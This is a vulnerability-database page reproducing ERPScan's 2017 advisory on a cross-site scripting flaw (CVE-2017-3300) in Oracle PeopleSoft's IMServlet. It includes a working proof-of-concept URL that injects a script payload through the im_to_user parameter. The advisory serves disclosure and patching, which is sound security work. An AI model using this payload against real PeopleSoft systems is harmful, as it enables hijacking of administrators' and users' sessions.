| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Oracle PeopleSoft Enterprise PeopleTools Component Cross-Site Scripting Vulnerability | 24 Jan 201700:00 | – | cnvd | |
| CVE-2017-3300 | 27 Jan 201722:01 | – | cve | |
| CVE-2017-3300 | 27 Jan 201722:01 | – | cvelist | |
| Oracle PeopleSoft – XSS vulnerability | 31 Oct 201600:00 | – | erpscan | |
| EUVD-2017-12421 | 7 Oct 202500:30 | – | euvd | |
| CVE-2017-3300 | 27 Jan 201722:59 | – | nvd | |
| Oracle Critical Patch Update Advisory - January 2017 | 17 Jan 201700:00 | – | oracle | |
| CVE-2017-3300 | 27 Jan 201722:59 | – | osv | |
| Oracle PeopleSoft HCM 9.2 Cross Site Scripting | 23 Jan 201700:00 | – | packetstorm | |
| Code injection | 27 Jan 201722:59 | – | prion |
Application: Oracle PeopleSoft
Vendor: Oracle
Bugs: XXS
Reported: 31.10.2016
Vendor response: 1.11.2016
Date of Public Advisory: 17.01.2017
Reference: Oracle CPU Jan 2017
Authors: Vahagn Vardanyan, Dmitry Yudin
1. ADVISORY INFORMATION
Title: Oracle PeopleSoft a XSS vulnerability
Advisory ID: [ERPSCAN-17-005]
Risk: High
Advisory URL:
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/
Date published: 17.01.2017
Vendor contacted: Oracle
2. VULNERABILITY INFORMATION
Class: XSS [CWE-79]
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2017-3300
CVSS Base Score: 6.1
3. VULNERABILITY DESCRIPTION
An attacker can use a special HTTP request to hijack session data of
administrators or users.
4. VULNERABLE PACKAGES
$ psreleaseinfo
ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2
PORTAL.war/WEB-INF/lib/mcfIM.jar
$ md5sum ./PORTAL.war/WEB-INF/lib/mcfIM.jar
36982c7d3c059ec9c2d9aaf0c35a65d3 ./PORTAL.war/WEB-INF/lib/mcfIM.jar
5. SOLUTIONS AND WORKAROUNDS
Oracle CPU January 2017
6. AUTHOR
Dmitri Yudin (@ret5et)/ERPScan & Vahagn Vardanyan (@vah_13 )/ERPScan
7. TECHNICAL DESCRIPTION
7.1. Proof of Concept
xss
http://localhost:8000/IMServlet?Method=MSN_PRESENCE&im_server_name=MSN&im_server=127.0.0.1:8000&im_to_user=%3Ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3E%3Ca:body%20onload=%27alert%28document.location%29%27/%3E%3C/a%3E
8. REPORT TIMELINE
Reported: 31.10.2016
Vendor response: 1.11.2016
Date of Public Advisory: 17.01.2017
9. REFERENCES
http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation